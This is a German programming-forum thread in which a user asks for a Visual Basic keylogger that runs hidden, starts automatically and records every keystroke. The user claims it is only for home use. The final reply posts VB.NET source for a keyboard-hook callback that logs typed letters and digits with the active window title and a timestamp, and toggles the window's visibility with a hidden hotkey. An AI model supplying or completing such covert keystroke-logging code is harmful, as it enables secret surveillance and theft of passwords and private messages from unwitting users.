Keylogger

Habaya

Grünschnabel
hey kann mir jdm in kleines Tutourial für einen Keylogger mit Visual Basic geben?

Er sollte folgende Funktionen haben:

- Versteckt im Hintergrund laufen (Meinetwegen kann er vom Taskmanager gesehen werden)
-Alle Tastenberührungen speichern
-Er sollte sich am Anfang automatisch versteckt öffnen

Ich will das für den Heimgebrauch nutzen nichts illegales sonst hätte ich geschrieben, dass man es im Taskmaager sehen darf.

Danke im Voraus,

Liebe Grüße,

Habaya
 
Das habe ich bereits angeschaut gehabt, doch es hat mir nicht weitergeholfen.

Auch die Downloads waren für eine ältere Version von VB gedacht...


Kann mir jemand einen Code zeigen und erklären für was die Codes stehen..?

Ich habe das bisher so angefangen bevor das Coden kam:

Neues Projekt>TextBox>Eigenschaftenfenster>Multiline>True>Readon>True>Timer>Eigenschaftsfenster>Enabled>True>Interval>2

Dann habe ich einen Doppelklick auf Timer 1 gemacht und jetzt brauche ich den Code.


Liebe Grüße

Habaya
 
Der Code steht doch im Tutorial, füge den einfach ein.
Ein wenig Selbstinitiative ist nicht schlecht, wenn der runtergeladene Code nicht gleich funktioniert.
 
Gut, dann bitten ich mal einen Admin das ganze ins VB.Net.Forum zu verschieben. Denn hier kriegst du VB6-Lösungen die du aber nicht brauchen kannst.
 
Code:
   1.
      Public Function KeyboardCallback(ByVal Code As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer
   2.
       
   3.
      'Get current foreground window title
   4.
      Dim CurrentTitle = GetActiveWindowTitle()
   5.
       
   6.
      'If title of the foreground window changed
   7.
      If CurrentTitle <> LastCheckedForegroundTitle Then
   8.
      LastCheckedForegroundTitle = CurrentTitle
   9.
      'Add a little header containing the application title and date
  10.
      KeyLog &= vbCrLf & "----------- " & CurrentTitle & " (" & Now.ToString() & ") ------------" & vbCrLf
  11.
      End If
  12.
       
  13.
      'Variable to hold the text describing the key pressed
  14.
      Dim Key As String = ""
  15.
       
  16.
      'If event is KEYDOWN
  17.
      If wParam = WM_KEYDOWN Or wParam = WM_SYSKEYDOWN Then
  18.
       
  19.
      'If we can block events
  20.
      If Code >= 0 Then
  21.
      'If Ctrl+Alt+S
  22.
      If My.Computer.Keyboard.CtrlKeyDown And My.Computer.Keyboard.AltKeyDown And lParam.vkCode = virtualKey.K_S Then
  23.
      Me.Visible = Not Me.Visible 'Hide/Show form
  24.
      Return 1 'Block event
  25.
      End If
  26.
      End If
  27.
       
  28.
      'Translate virtual key into character/expression
  29.
      Select Case lParam.vkCode
  30.
      Case virtualKey.K_0 To virtualKey.K_9
  31.
      Key = ChrW(lParam.vkCode)
  32.
      Case virtualKey.K_A To virtualKey.K_Z
  33.
      Key = ChrW(lParam.vkCode + 32)
  34.
      End Select
  35.
      End If
  36.
       
  37.
      'Add it to the log
  38.
      KeyLog &= Key
  39.
       
  40.
      Return CallNextHookEx(KeyboardHandle, Code, wParam, lParam) 'Let event go to the other applications
  41.
       
  42.
      End Function
  43.
       
  44.
      Private Function GetActiveWindowTitle() As String
  45.
      Dim MyStr As String
  46.
      MyStr = New String(Chr(0), 100)
  47.
      GetWindowText(GetForegroundWindow, MyStr, 100)
  48.
      MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
  49.
       
  50.
      Return MyStr
  51.
      End Function
 
Zuletzt bearbeitet:
Zurück